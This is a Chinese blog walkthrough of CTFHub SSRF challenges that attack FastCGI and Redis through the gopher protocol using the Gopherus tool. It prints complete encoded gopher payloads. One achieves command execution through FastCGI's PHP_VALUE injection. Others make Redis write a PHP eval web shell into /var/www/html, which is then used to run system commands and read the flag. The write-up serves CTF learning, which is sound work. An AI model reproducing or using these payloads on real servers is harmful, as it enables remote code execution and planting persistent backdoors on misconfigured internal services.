CTFHub ssfr FastCgi协议 & Redis 协议

已于 2022-02-18 11:25:18 修改
阅读量1.8k 收藏 3
点赞数 4
分类专栏: ctfhub 文章标签: redis 数据库 database
于 2022-02-18 11:24:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/122999290
版权

ctfhub ssfr FastCgi & Redis 协议

FastCgi协议

这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助

首先我们要先了解这个协议内容(具体查看ctfhub里面的文章)

在本关我们可以尝试使用linux解决问题(**需要下载python2版本!!!,否则Gopherus无法读取 **并且下载Gopherus脚本)

linux python2下载方法:

[参考博客]((1条消息) 完美解决 Linux安装python2.7 方案_你懂了我的冬天的博客-CSDN博客_linux python2.7)
Gopherus脚本下载方法:
在这里插入图片描述

使用脚本:

cd  Gopherus

python2 gopherus.py --exploit fastcgi

先选择一个当前存在的php页面,选择主页

index.php,命令先执行ls

然后是cat
在这里插入图片描述

注意:需要注意的是进行编码时要去掉没有用的空格或者换行,否则将无法成功获得flag

我们获得payload后还需要再进行一次编码

?url=gopher%3A%2F%2F127.0.0.1%3A9000%2F_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%25F6%2506%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH59%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2509SCRIPT_FILENAMEindex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%253B%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Ff%252A%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500

注意:需要注意的是进行编码时要去掉没有用的空格或者换行,否则将无法成功获得flag

直接访问地址,
成功获得 flag

Redis 协议

这次来攻击redis协议吧.redis://127.0.0.1:6379,资料?没有资料!自己找!

我们先了解下Redis协议吧

通关的关键还是 Gopherus脚本

python2 gopherus.py --exploit redis

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PZ2I1OCs-1645154117238)(C:\Users\hcj\AppData\Roaming\Typora\typora-user-images\image-20220218105831290.png)]

在进行一次url编码:

gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252447%250D%250A%250A%250A%253C%253Fphp%2520phpinfo%2528%2529%253B%2520%2540eval%2528%2524_POST%255B%2527shell%2527%255D%2529%253B%253F%253E%2520%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

然后上传到网页:

在这里插入图片描述

出现504界面,说明上传成功,如果不放心可以进行查看shell.php

在这里插入图片描述

?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_GET%255B%2522feng%2522%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25248%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A

然后进行AntSword链接,发现链接失败(不清楚,很玄学)

没办法换种方法:

重新使用脚本,更改 脚本内容

 '<?php eval($_GET["shell"]);?>'

重新上传,然后使用 get 进行访问:

shell.php?shell=system("ls /");

在这里插入图片描述

shell.php?feng=system("cat /flag_44c78dae075af9658640863a76166df9");

在这里插入图片描述

点击提交,成功!

hcjtn
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3860
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
超微H12SSFR-AN6用户手册
03-24
### 超微H12SSFR-AN6用户手册知识点概述 #### 一、产品简介 - **产品名称**:超微H12SSFR-AN6是一款由Super Micro Computer, Inc.(以下简称“Supermicro”)制造的服务器主板。 - **版本信息**:本用户手册版本为...
CTFHUB-SSRF-上传文件
weixin_68416970的博客
07-01 469
CTFHUB技能树、SSRF、上传文件的通关教程
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(二)(上传文件,FastCGIRedis协议,URL Bypass)
xt350488的博客
06-19 1063
FastCGI是一种用于数据传输的通信协议,与HTTP协议相似,它提供了一个进行数据交换的通道。详细见 https://blog.csdn.net/mysteryflower/article/details/94386461。
CTFHUB WEB ssfr漏洞(上)
wwwwyyyrre的博客
04-12 231
随着HTTP协议的壮大,Gopher协议已经慢慢的淡出了我们的视线,但是Gopher协议很多组件都支持并且可以做很多事,在SSRF中,Gopher协议可以对FTP、Telnet、Redis、Memcache、mysql进行攻击,也可以发送GET、POST 请求。作用:Gopher协议可以说是SSRF中的万金油。在第一次编码要把%0A全部改成%0D0A,%0A是在linux系统中中代表换行符,在windos中是%0D0A代表换行符,但是网上的编码器大都是编码的%0A,所以我们需要改成windos能够识别的。
CTFHub-Web-SSRF练习
Atkx's Blog
10-18 6242
这里写自定义目录标题内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议 内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 访问靶机地址,发现url后面多了/?url=_ 然后访问127.0.0.1/flag.php Payload: ?url=127.0.0.1/flag.php 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。 Payload
Redis渗透&SSRF的利用-看这一篇就够了
cike_y
02-05 1498
关于redis的渗透利用,及SSRF的方式
ctf web方向与php学习记录23之SSFR初见
这周末在做梦的博客
10-27 227
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。 分享一个学习网站 https://xz.aliyun.com/t/2115 一,内网访问 ?url=http://127.0.0.1/flag.php即可 ?url=http://@127.0.0.1/flag.php也可以 ...
SSRF+gopher协议渗透struts2
qq_43665434的博客
03-29 651
SSRF+gopher协议渗透struts2 实验主机 windows10 192.168.1.120 #SSFR漏洞主机 centos8搭建struts2-045环境 192.168.1.106 实验环境 SSRF漏洞代码curl_exec.php: php版本>5.3才可使用gopher协议 可用var_dump(curl_version())来调试 #win10主机 curl_exec.php <?php $url = $_GET['url']; #var_d
SSFR概念及简单使用(超详讲)
weixin_59047731的博客
11-27 810
SSRF漏洞就是通过篡改获取资源的请求发送给服务器但是服务器并没有检测这个请求是否合法的然后服务器以他的身份来访问其他服务器的资源。
学习笔记SSFR漏洞
明哥哥知识分享
08-30 1095
一. SSRF SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 二. 用处 1.内外网的端口和服务扫描 2.主
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
小型林间独栖反刍动物栖息地选择研究进展 (2007年)
06-05
文章概述了SSFR栖息地的一般生态特征对其栖息地利用的影响,阐述了不同尺度水平的SSFR栖息地选择的研究现状,结合其他有蹄类动物的相关研究,论述了关于SSFR家域、觅食地和卧息地选择的研究进展,简要探讨了栖息地...
multiparameter_cloud_retrieval:用于从传输的辐射进行高光谱云遥感的 IDL 和 python 代码的集合
06-24
使用多个光谱形状参数检索云属性专门用于计算云特性(云光学厚度、云粒子有效半径和云热力学相位)的科学分析代码使用 4STAR 机载研究平台仪器进行的天顶光谱辐射测量或 SSFR 地面辐射测量来检索这些云特性。...
频域法辨识同步机参数 (1995年)
05-09
提供和比较了静态频率响应法(SSFR)和在线频率响应法(OLFR)两种测定同步机参数的方法。两种方法都能提供d轴和q轴的参数,并都经过实验验证,SSFR方法简单易行,获得的数据与设计值接近。OLFR法...
外卖项目day08---店铺营业状态设置/用到redis
2301_79693537的博客
07-23 213
【代码】外卖项目day08---店铺营业状态设置/用到redis
Redisson中RQueue的使用场景附一个异步的例子
最新发布
qq_40592590的博客
07-24 944
redis
Redis 7.x 系列【29】集群原理之自动故障转移
记录知识、锤炼自我
07-24 969
Redis 集群的某些节点出现故障时,可以自动进行故障转移,地将从节点提升为主节点,保证服务的连续性和数据的可用性。
全球医院信息化进程:现状、挑战与未来
此外,美国制定了一系列法律法规,如HL7、HIPAA、SSFR等,以保障数据传输标准、患者信息隐私和数字化信息的安全。 最新的立法动向表明,202023年,美国参议员希拉里和BillFrist提出了一项关于建立医疗信息系统的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值